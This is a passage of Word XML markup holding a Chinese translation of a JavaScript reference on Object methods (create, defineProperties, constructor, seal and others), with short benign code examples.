      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.isExtensible()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>检查当前对象是否能添加到新的属性中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.isFrozen()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>检查当前对象是否已冻结。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.isSealed()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>检查指定对象是否为封闭的（</w:t>
      </w:r>
      <w:r>
        <w:t>sealed</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.keys()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个包含指定对象的所有非继承可枚举属性名的数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>阻止向指</w:t>
      </w:r>
      <w:r>
        <w:t>定对象添加新的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Object.seal()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>阻止向指定对象添加新属性或删除现有属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>类是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言的内置数据类型。它是所有其他</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象的超类，因此，</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>类的所有方法和行为都被其他对象继承了。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中对象的基本行为的讲解在第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了上面显示的</w:t>
      </w:r>
      <w:r>
        <w:t>Object()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，也可以用</w:t>
      </w:r>
      <w:r>
        <w:t>6.1</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>直接量语法来创建并初始化对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Function.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>、第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="721" w:name="Object_constructor"/>
      <w:r>
        <w:t>Object.constructor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="721"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象的构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>object.constructor</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所有对象的</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性都指向用做当前对象的构造函数的那个函数。例如，如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建一个数组</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>a.constructor</w:t>
      </w:r>
      <w:r>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=new Array(1,2,3);//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.constructor==Array//</w:t>
      </w:r>
      <w:r>
        <w:t>值为</w:t>
      </w:r>
      <w:r>
        <w:t>tru</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性经常用于检测未知对象的类型。给定一个未知的值，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>操作符来检查它是一个原始值还是一个对象。如果它是一个对象，则可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性来检查对象的类型。例如，下面的函数用于检查给定的值是否是一个数组：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function isArray(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return((typeof x=="object")</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>(x.constructor==Array));</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不过，需要注意，这个技术只对核心</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的内置对象有效，对那些宿主对象（如客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象等）而言则未必有效。</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法提供了另外一种判断未知对象类型的方法。</w:t>
      </w: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Object.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="722" w:name="Object_create__"/>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="722"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用指定的原型和属性来创建一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.create(proto)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.create(proto,descriptors)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>proto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>新创建对象的原型，可为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>descriptors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个可选对象，把属性名映射到属性描述符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新创建的对象，继承自</w:t>
      </w:r>
      <w:r>
        <w:t>proto</w:t>
      </w:r>
      <w:r>
        <w:t>，同时拥有</w:t>
      </w:r>
      <w:r>
        <w:t>descriptors</w:t>
      </w:r>
      <w:r>
        <w:t>所描述的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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w:t>
      </w:r>
      <w:r>
        <w:t>proto</w:t>
      </w:r>
      <w:r>
        <w:t>不是对象也不是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，或者指定</w:t>
      </w:r>
      <w:r>
        <w:t>descriptors</w:t>
      </w:r>
      <w:r>
        <w:t>但它引发</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>抛出了一个</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError</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Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>创建并返回一个新的以</w:t>
      </w:r>
      <w:r>
        <w:t>proto</w:t>
      </w:r>
      <w:r>
        <w:t>为原型的对象。这意味着新对象将继承</w:t>
      </w:r>
      <w:r>
        <w:t>proto</w:t>
      </w:r>
      <w:r>
        <w:t>的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果指定可选的</w:t>
      </w:r>
      <w:r>
        <w:t>descriptors</w:t>
      </w:r>
      <w:r>
        <w:t>参数，则</w:t>
      </w:r>
      <w:r>
        <w:t>Objects.create()</w:t>
      </w:r>
      <w:r>
        <w:t>将把它指定的属性添加到新对象中，等同于调用</w:t>
      </w:r>
      <w:r>
        <w:t>Obje</w:t>
      </w:r>
      <w:r>
        <w:t>ct.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>。使用两个参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create(p,d)</w:t>
      </w:r>
      <w:r>
        <w:t>等同于：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperties(Object.create(p),d);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:t>descriptors</w:t>
      </w:r>
      <w:r>
        <w:t>参数的更多细节可参考</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>，关于属性描述符对象的更多解释可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>不是在具体的对象上调用的方法：它是一个全局函数，需要传入一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个对象，有</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>属性，同时继承属性</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p=Object.create({z:0},{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x:{value:1,writable:false,enumerable:true,configurable:true},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y:{value:2,writable:false,enumerable:true,configurable:true},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Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.1</w:t>
      </w:r>
      <w:r>
        <w:t>节、</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="723" w:name="Object_defineProperties__"/>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="723"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建或配置对象的多个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperties(o,descriptors)</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要在其上创建或配置属性的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>descriptors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将属性名映射到属性描述符的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>。</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w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>不是一个对象，或不能创建或配置某个指定的属性，就抛出该异常。这个函数不是原子性的：它可能在创建或配置几个属性之后，同时还有别的属性未创建或配置时抛出异常。关于可能导致</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t>的属性配置错误可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>在对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>上创建或配置由</w:t>
      </w:r>
      <w:r>
        <w:t>descriptors</w:t>
      </w:r>
      <w:r>
        <w:t>指定及描述的属性。</w:t>
      </w:r>
      <w:r>
        <w:t>descriptors</w:t>
      </w:r>
      <w:r>
        <w:t>中的属性名也就是要在</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>上创建或配置的属性名，同时指定对应的属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>的行为非常类似</w:t>
      </w:r>
      <w:r>
        <w:t>Object.d</w:t>
      </w:r>
      <w:r>
        <w:t>efineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>，可参阅这个函数以便了解更多细节。关于描述符对象的更多细节可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor()</w:t>
      </w:r>
      <w:r>
        <w:t>。</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把只读属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>添加到新创建的对象中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p=Object.defineProperties({},{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x:{value:0,writable:false,enumerable:true,configurable:true},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y:{value:1,writable:false,enumerable:true,configurab</w:t>
      </w:r>
      <w:r>
        <w:t>le:true},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Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="724" w:name="Object_defineProperty__"/>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="724"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建或配置对象的一个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
